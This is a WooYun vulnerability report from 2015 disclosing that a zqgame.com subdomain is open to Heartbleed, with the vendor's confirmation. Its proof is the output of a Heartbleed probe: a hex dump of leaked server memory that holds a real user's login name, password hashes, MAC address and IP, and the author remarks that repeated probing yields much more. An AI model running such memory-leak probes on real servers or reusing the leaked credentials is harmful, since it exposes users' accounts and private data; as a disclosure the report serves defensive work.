当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123497

漏洞标题:中青宝某分站Heartbleed漏洞

相关厂商:中青宝互动网络股份有限公司

漏洞作者: 紫霞仙子

提交时间:2015-06-29 17:35

修复时间:2015-08-13 17:58

公开时间:2015-08-13 17:58

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

233

详细说明:

weixin.zqgame.com

漏洞证明:

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 1510
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 54 4D 4C 2C ....#.......TML,
00e0: 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 like Gecko) Chr
00f0: 6F 6D 65 2F 33 31 2E 30 2E 31 36 35 30 2E 36 33 ome/31.0.1650.63
0100: 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 22 0A Safari/537.36".
0110: 01 00 00 00 00 00 00 00 47 45 54 20 2F 6C 6F 67 ........GET /log
0120: 69 6E 2F 31 2E 30 2F 6E 61 6D 65 3D 71 61 7A 71 in/1.0/name=qazq
0130: 77 65 61 7A 61 73 64 7A 78 63 26 4D 44 35 3D 31 weazasdzxc&MD5=1
0140: 32 64 33 37 33 35 61 37 31 38 36 63 32 33 34 65 2d3735a7186c234e
0150: 61 64 36 35 61 31 63 32 64 32 64 35 31 36 66 26 ad65a1c2d2d516f&
0160: 53 48 41 31 3D 66 63 35 39 34 66 36 38 65 33 31 SHA1=fc594f68e31
0170: 37 33 34 35 31 31 32 62 32 62 31 31 35 34 30 34 7345112b2b115404
0180: 64 33 61 35 66 34 61 34 31 35 34 32 61 26 61 64 d3a5f4a41542a&ad
0190: 76 65 72 69 6E 66 6F 3D 72 77 26 6D 61 63 3D 39 verinfo=rw&mac=9
01a0: 38 3A 36 63 3A 66 35 3A 36 34 3A 35 33 3A 36 38 8:6c:f5:64:53:68
01b0: 2F 31 35 34 2F 38 37 33 33 65 62 61 30 30 61 61 /154/8733eba00aa
01c0: 61 31 38 34 38 37 64 39 32 30 35 32 63 38 39 36 a18487d92052c896
01d0: 31 62 34 63 30 34 65 31 61 30 36 34 66 2F 31 34 1b4c04e1a064f/14
01e0: 33 35 35 34 34 36 30 35 31 38 39 2F 30 2F 33 62 35544605189/0/3b
01d0: 31 62 34 63 30 34 65 31 61 30 36 34 66 2F 31 34 1b4c04e1a064f/14
01e0: 33 35 35 34 34 36 30 35 31 38 39 2F 30 2F 33 62 35544605189/0/3b
01f0: 64 32 39 64 64 31 61 36 39 65 62 35 64 62 33 31 d29dd1a69eb5db31
0200: 32 64 32 31 63 65 38 62 34 30 32 35 31 36 62 36 2d21ce8b402516b6
0210: 65 31 36 38 35 36 20 48 54 54 50 2F 31 2E 30 0D e16856 HTTP/1.0.
0220: 0A 58 2D 52 65 61 6C 2D 49 50 3A 20 31 32 35 2E .X-Real-IP: 125.
0230: 37 31 2E 32 30 39 2E 31 30 38 0D 0A 48 6F 73 74 71.209.108..Host
0240: 3A 20 70 6C 61 74 66 6F 72 6D 2E 61 70 69 2E 7A : platform.api.z
0250: 71 67 61 6D 65 2E 63 6F 6D 0D 0A 58 2D 46 6F 72 qgame.com..X-For
0260: 77 61 72 64 65 64 2D 46 6F 72 3A 20 31 32 35 2E warded-For: 125.
0270: 37 31 2E 32 30 39 2E 31 30 38 0D 0A 58 2D 46 6F 71.209.108..X-Fo
0280: 72 77 61 72 64 65 64 2D 46 6F 72 3A 20 31 32 35 rwarded-For: 125
0290: 2E 37 31 2E 32 30 39 2E 31 30 38 0D 0A 43 6F 6E .71.209.108..Con
02a0: 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
02b0: 0D 0A 67 00 00 00 00 00 00 00 00 00 00 00 00 00 ..g.............
02c0: 00 00 00 00 00 00 00 00 C8 00 00 00 00 00 00 00 ................
02d0: 01 00 00 00 00 00 00 00 99 FC FF FF FF FF FF FF ................
02e0: AC 00 00 00 00 00 00 00 30 62 41 01 00 00 00 00 ........0bA.....
02f0: 00 00 00 00 00 00 00 00 90 0C 41 01 00 00 00 00 ..........A.....
0300: 00 00 00 00 00 00 00 00 E0 5D 41 01 00 00 00 00 .........]A.....
0310: 0B 00 00 00 00 00 00 00 88 CB 3F 01 00 00 00 00 ..........?.....
0320: 00 04 00 00 00 00 00 00 20 21 41 01 00 00 00 00 ........ !A.....
0330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0340: E0 59 2F 01 00 00 00 00 AE EF 2E 00 00 00 00 00 .Y/.............
0350: 04 00 00 00 00 00 00 00 30 CD 3F 01 00 00 00 00 ........0.?.....
0360: 1D 00 00 00 00 00 00 00 35 CD 3F 01 00 00 00 00 ........5.?.....
0370: 53 CD 3F 01 00 00 00 00 BA 26 7B BC 3D 82 C7 F0 S.?......&{.=...
0380: 0E 00 00 00 00 00 00 00 57 CD 3F 01 00 00 00 00 ........W.?.....
0390: 03 00 00 00 00 00 00 00 66 CD 3F 01 00 00 00 00 ........f.?.....
03a0: 6A CD 3F 01 00 00 00 00 15 A9 2F 00 00 00 00 00 j.?......./.....
03b0: 04 00 00 00 00 00 00 00 78 CD 3F 01 00 00 00 00 ........x.?.....
03c0: 2A 00 00 00 00 00 00 00 7D CD 3F 01 00 00 00 00 *.......}.?.....
03d0: A8 CD 3F 01 00 00 00 00 0E 60 D4 2E 0E 8D 36 24 ..?......`....6$
03e0: 0C 00 00 00 00 00 00 00 AC CD 3F 01 00 00 00 00 ..........?.....
03f0: 18 00 00 00 00 00 00 00 B9 CD 3F 01 00 00 00 00 ..........?.....
0400: D2 CD 3F 01 00 00 00 00 00 00 00 00 00 00 00 00 ..?.............
0410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
可以看到,能抓到用户名和md5(密码),X-Forwarded-For IP信息。
多抓几次,可以抓到大量敏感信息,

修复方案:

~~

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-29 17:57

厂商回复:

非常感谢您的反馈,经测试漏洞确实存在。我们会尽快修复~

最新状态:

暂无